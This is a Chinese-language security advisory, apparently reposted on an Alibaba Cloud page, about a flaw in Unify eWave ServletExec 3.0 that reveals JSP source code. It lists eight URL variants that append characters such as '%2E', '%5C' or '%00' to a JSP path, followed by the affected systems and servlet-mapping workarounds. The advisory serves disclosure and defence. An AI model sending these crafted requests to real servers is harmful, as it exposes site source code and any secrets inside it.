Unify eWave ServletExec泄露jsp原始碼漏洞

來源:互聯網
上載者:User
js|servlet|原始碼


涉及程式:
ServletExec

描述:
在HTTP請求中添加特殊字元導致暴露JSP原始碼檔案

詳細:
Unify eWave ServletExec 是一個 Java/Java Servlet 引擎外掛程式,主要用於 WEB 伺服器,例如:Microsoft IIS, Apache, Netscape Enterprise 伺服器等等。

當一個 HTTP 要求中添加下列字元之一,ServletExec 將返回 JSP 原始碼檔案。
.
%2E
+
%2B
\
%5C
%20
%00

成功的利用該漏洞將導致泄露指定的JSP檔案的原始碼

例如:
使用下面的任意一個URL請求將輸出指定的JSP檔案的原始碼:
http://target/directory/jsp/file.jsp.
http://target/directory/jsp/file.jsp%2E
http://target/directory/jsp/file.jsp+
http://target/directory/jsp/file.jsp%2B
http://target/directory/jsp/file.jsp\
http://target/directory/jsp/file.jsp%5C
http://target/directory/jsp/file.jsp%20
http://target/directory/jsp/file.jsp%00

受影響的系統:
Unify eWave ServletExec 3.0c
- Sun Solaris 8.0
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
- Linux kernel 2.3.x
- IBM AIX 4.3.2
- HP HP-UX 11.4
Unify eWave ServletExec 3.0
- Sun Solaris 8.0
- Microsoft Windows 98
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
- Linux kernel 2.3.x
- IBM AIX 4.3.2
- HP HP-UX 11.4

解決方案:
臨時解決辦法:
如果沒有使用任何靜態頁面或映像,可以配置一個預設的 servlet,並將“/”映射到這個預設的 servlet。這樣當收到一個未映射到某個 servlet 的 URL 時,這個預設的servlet 就會被調用。在這種情況下,預設的 servlet 可以僅僅返回“未找到檔案”。如果使用了靜態頁面或映像,仍然可以作這樣的配置,但是需要讓這個預設的servlet 處理對合法的靜態頁面和映像的請求。

另一種可能就是將*.jsp+、*.jsp.和*.jsp\等映射到一個 servlet,而該servlet只是返回“未找到檔案”。對於*.jsp%00和*.jsp%20這樣的情況,映射應以未經編碼的形式輸入。例如,對於*.jsp%20的映射應輸入“*.jsp ”。注意%20被轉換成一個空白字元。




相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.